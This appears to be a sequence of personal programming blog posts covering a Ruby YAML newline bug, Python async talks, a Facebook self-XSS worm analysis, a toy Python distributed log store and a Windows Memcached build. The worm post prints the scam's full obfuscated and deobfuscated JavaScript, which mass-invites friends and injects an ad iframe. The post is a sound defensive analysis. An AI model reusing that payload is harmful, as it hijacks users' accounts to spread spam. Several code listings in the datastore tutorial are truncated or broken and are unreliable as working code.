Bug in Ruby YAML

Recently I stumble on a really wierd bug in Ruby's YAML implementation(using syck parser that is default for ruby < 1.9.3).

The problem is that the parser converts \r\n(windows new line) into \n(linux new line),you can see this error by running this code:


running this will return "test\n" while it should return "test\r\n" (serialzing and deseralizing are suppose to be exact inverse function).

This is fixed in Ruby 1.9.3,since it uses the psych parser by default.

Async networking in python

I gave a talk at PyWEBIL meeting yesterday about async networking in python.

The topic of the talk was a quick overview of the frameworks available in python(and also node.js) and example of a comet chat room in each framework.

slides can be found here and code examples here.

NOTE:the code examples are meant to be simple and probably not the correct way to implement comet in each framework.

Facebook worm ahead

Few days ago i got a facebook notification about a friend of my suggesting that i "like" some group.

it was a group that finds your celebrity twin(in terms of appearance),i have heard about some technologies that can do that so i went to see what the group is about,i know that most of them are scam.

This group was not a exception,it asked you to click like in order to show its info page,after that it asked you to click a link,after clicking that link a modal window appeared. 

it first asks you which browser you are using(WTF?) then it makes you do a series of keyboard combinations(ctrl-C,alt-D,ctrl-V in firefox) that ends up in pasting a nasty JavaScript code into your url bar and then they ask you to press enter :)

of course i didn`t and i took that code and started to analyze it:

javascript:(function(){a='app134292463250339_jop';b='app134292463250339_jode';ifc='app134292463250339_ifc';ifo='app134292463250339_ifo';mw='app134292463250339_mwrapper';eval(function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('J e=["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i\\f","\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k\\k\\f\\x\\M\\N\\G\\O","\\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\j\\h","\\i\\g\\H\\f\\r\\f","\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h","\\p\\i\\g\\p\\H","\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h","\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r","\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o"];d=U;d[e[2]](V)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);c=d[e[9]](e[8]);c[e[11]](e[10],I,I);s[e[12]](c);C(D(){W[e[13]]()},E);C(D(){X[e[16]](e[14],e[15])},E);C(D(){m[e[12]](c);d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]},E);',62,69,'||||||||||||||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|mw|fs|SocialGraphManager|ifo|ifc|||||||'.split('|'),0,{}))})();

As I have done my fair share of JavaScript coding,I quickly identified it as minified by dean edwards packer( function(p,a,c,k,e,r) is a easy way to see that).

so next thing was to de-minize it,that was done by running the inner function in firebug,what i got was this:

var _0x95ea=["\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79","\x73\x74\x79\x6C\x65","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x68\x69\x64\x64\x65\x6E","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x76\x61\x6C\x75\x65","\x73\x75\x67\x67\x65\x73\x74","\x6C\x69\x6B\x65\x6D\x65","\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74\x73","\x63\x72\x65\x61\x74\x65\x45\x76\x65\x6E\x74","\x63\x6C\x69\x63\x6B","\x69\x6E\x69\x74\x45\x76\x65\x6E\x74","\x64\x69\x73\x70\x61\x74\x63\x68\x45\x76\x65\x6E\x74","\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67"];d=document;d[_0x95ea[2]](mw)[_0x95ea[1]][_0x95ea[0]]=_0x95ea[3];d[_0x95ea[2]](a)[_0x95ea[4]]=d[_0x95ea[2]](b)[_0x95ea[5]];s=d[_0x95ea[2]](_0x95ea[6]);m=d[_0x95ea[2]](_0x95ea[7]);c=d[_0x95ea[9]](_0x95ea[8]);c[_0x95ea[11]](_0x95ea[10],true,true);s[_0x95ea[12]](c);setTimeout(function(){fs[_0x95ea[13]]()},5000);setTimeout(function(){SocialGraphManager[_0x95ea[16]](_0x95ea[14],_0x95ea[15])},5000);setTimeout(function(){m[_0x95ea[12]](c);d[_0x95ea[2]](ifo)[_0x95ea[4]]=d[_0x95ea[2]](ifc)[_0x95ea[5]]},5000);

so it seems there is another layer of obfuscation,the most intersting thing was the _0x95ea array that was hex encoded,so i just copy-paste it to a python shell,and the result was:

['visibility', 'style', 'getElementById', 'hidden', 'innerHTML', 'value', 'suggest', 'likeme', 'MouseEvents', 'createEvent', 'click', 'initEvent', 'dispatchEvent', 'select_all', 'sgm_invite_form', '/ajax/social_graph/invite_dialog.php', 'submitDialog']

ok so that seems to be a list of Javascript properties/methods and some other contants,we can see that the rest of the code is just refernecing the array,lets just replace the code with the values from the array:


ok so at first look I thought that it was only opening the invite window,hiding it and sending a invitation to your friends(that is the way i got the invitation and that is the worm like behiavor).

but that was because I overlooked this line:


this line injects this html fragemnt into the page:

<iframe width="700" height="550" frameborder="0" scrolling="yes" src="http://xa.ly/Vx"></iframe>

which is a link to somekind of link shortner that gives you money for each impression,and also it redirects you to a page with ads,so the creator of this page makes some $$ for each sucker that clicks like!

the group currently have 17,000ish users,for 10 cent(a assumption) per impression,he made a nice 1740$ of thin air!

so thats it,it spread like a worm(altougth a bit manual) and makes the author some money.

the thing is that the technique can be used to do real evil stuff like stealing your facebook account(for example by sending your cookies to a remote server),most of tech savy people out there will not fall for this kind of crap,but 17,000 stupid users already did.

PS:the link to the group is http://www.facebook.com/pages/hds-mzw-t-htwm-slkm-bpyysbwq-wbd/128140680541003 it is in Hebrew,so the target audience is small,I wonder how much people a english group can attract :)

PS2:I reported this group but that doesn`t seems to shut down this page,I hope that this post will make facebook shutdown this kind of groups.

Writing a distributed datastore in Python

I am writing a distributed data-store in Python for a very specific kind of data,and I wanted to show how you can build a simple distributed system in Python.
For this post we will build a distributed log,This system allows you to store logs from many servers into one big log which is distributed between many machines.
We start by giving a overview of the components of the system:

diagram of components

This system have two major components,The master node and the storage nodes.
Storage nodes are simple dumb nodes that store and retrieve data when needed.

The master node is responsible for accepting writes from servers and sending those writes to the storage node in a way that the data get distributed to all the nodes.
When a server sends his log entries to the master,the following happens:

  1. master gets the K log entries and select N(the replication factor) nodes that will store the entries
  2. master send a copy of the K entries to the N nodes and waits for them to write it to their local store(be it memory or disk)
  3. master then register in his local datastructure that those N nodes have those K entries.

Also the master is responsible for client requests,when a client wants to read a portion of the log the following happens:

  1. he sends a request to the master with a time range that he wants to read.
  2. the master decided which nodes have the information and ask for each node the entries.
  3. the master combine all the information and send it back to the client.

This design(single master,multiple slaves) have pros and cons.


  • simple design,the master coordinates both read and writes.
  • complex operations can be implemented in the master,like garbage collecting.
  • the master have a consist view of the cluster and can make elaborated decisions on data placement.


  • SPOF(single point of failure) - in case the master is down then all logs are inaccessible,this problem can be solved using a shadow master(like it is done In Google File System) or by using a multi-master/no-master design(out of the scope of this post).
  • the cluster size is limited by the master capacity,for example there is a limit on the amount of RAM(or disk) a master have to keep track of which node have each log entry.
  • the amount of read/write load is limited by the master as all writes and reads must go to the master first.

Each components is basically a simple json-rpc server using wsgi-jsonrpc.

Lets start by looking on the storage node code(storage_node.py):

from optparse import OptionParser
from wsgiref import simple_server
from wsgi_jsonrpc import json_tools,WSGIJSONRPCApplication

class StorageNode(object):
    def __init__(self):
        self.entries = []
        self.dt_to_entries = {}

    def add_entries(self,data,dt):
        self.dt_to_entries[dt] = len(self.entries) - 1

    def get_entries(self,dts):
        return [(self.entries[self.dt_to_entries[dt]],dt) for dt in dts]

if __name__ == "__main__":   
  parser = OptionParser()
  parser.add_option("-m", "--master-port", dest="master_port",
help="master port",type="int")
  parser.add_option("-p", "--port", dest="port",help="storage port",
  (options, args) = parser.parse_args()
  node = StorageNode()
  print "joining master..."
  master = json_tools.ServerProxy(
"http://localhost:%d" % options.master_port)
    print "joining completed,serving..."
    server = simple_server.make_server('localhost', options.port,
  except Exception,e:
    print "not working",e

The storage node accepts two arguments,master port and port,the storage node sends a join request to the master when it start with his port so the master can communicate with the storage node.
The storage node have two functions,add_entires which is used to write new log entries to the local store(in this case a list) and get_entries which is used to retrieve entries by timestamps(dts parameter).

Now for the master node code:

from optparse import OptionParser
from random import sample
from collections import defaultdict
from wsgiref import simple_server
from wsgi_jsonrpc import json_tools,WSGIJSONRPCApplication

def get_proxy(port):
    return json_tools.ServerProxy("http://localhost:%d" %port)

class MasterNode(object):
    def __init__(self,options):
        self.options = options
        self.servers = set()
        self.dt_to_servers = {}
        self.dts = []

    def join(self,port):

    def add_entries(self,data,dt):
        print data,dt
        servers = sample(self.servers,options.replication_factor)
        for server in servers:
        self.dt_to_servers[dt] = servers

    def get_range(self,start_dt,end_dt):
        #should use binary search!
        servers_dts = defaultdict(list)
        for dt in self.dts:
          if dt >= start_dt and dt <= end_dt:

        dts_data = {}
        for server,dts in servers_dts.iteritems():
          response = get_proxy(server).get_intervals(dts)
          for data,dt in response['result']:
            dts_data[dt] = data
        return dts_data

if __name__ == "__main__":   
  parser = OptionParser()  
  parser.add_option("-p", "--port", dest="port",help="port",type="int")
  parser.add_option("-r", "--replication-factor",
dest="replication_factor",help="the replication factor for entries",
  (options, args) = parser.parse_args()
  print "running..."
  server = simple_server.make_server('localhost', options.port,

The master have a join method,this is the method that is called by the storage nodes when joining the cluster,the master register the ports of the storage nodes in the servers set.
The other two method are:

  • get_range - return all the entires between start_dt and end_dt
  • add_entries - add the entries that happened in dt(timestamp) to the distributed store.

Both of them do it in a distributed matter,adding a entry get copied to N(the replication factor) different storage node.
Getting entries by a datetime range is done by getting the entries from the nodes that contain the data.

This implementation have some limitations:

  • it assumes that all nodes are in the same machine on different ports(this is done on purpose since this is a demonstration),it can be easily fixed by storing full addresses instead of ports.
  • it doesn`t detect dead nodes,it will send requests to dead nodes this can be fixed by adding a heartbeat system to check each node state.
  • new nodes that join the cluster start getting data written to them but  they should get data from other nodes first in order to balance the load in the cluster(this is called bootstrapping).

All in all I think  this is a good start for anyone who is looking to build a distributed store.

Memcached 64-bit for Windows

UPDATE: this is not mantined nor official,you should use the couchbase or other builds

UPDATED BUILD:  http://blog.elijaa.org/index.php?post/2010/10/15/Memcached-for-Windows&similar

After spending a day searching for a Memcached Windows 64-bit build ,I finally gave up and compile it by myself.

I manage to build it based on Memcached 1.4.2 with service code from:http://jehiah.cz/projects/memcached-win32/

The build platform is mingw64(google it) and regular mingw for configuring(as mingw64 get recognize as cygwin).

This is true 64-bit,running stats will show you the pointer_size is 64 and you can make the memcached process go over 4GB.

You can download the binaries from here,source here.

Mirror: http://dl.dropbox.com/u/103946/memcached-win64.zip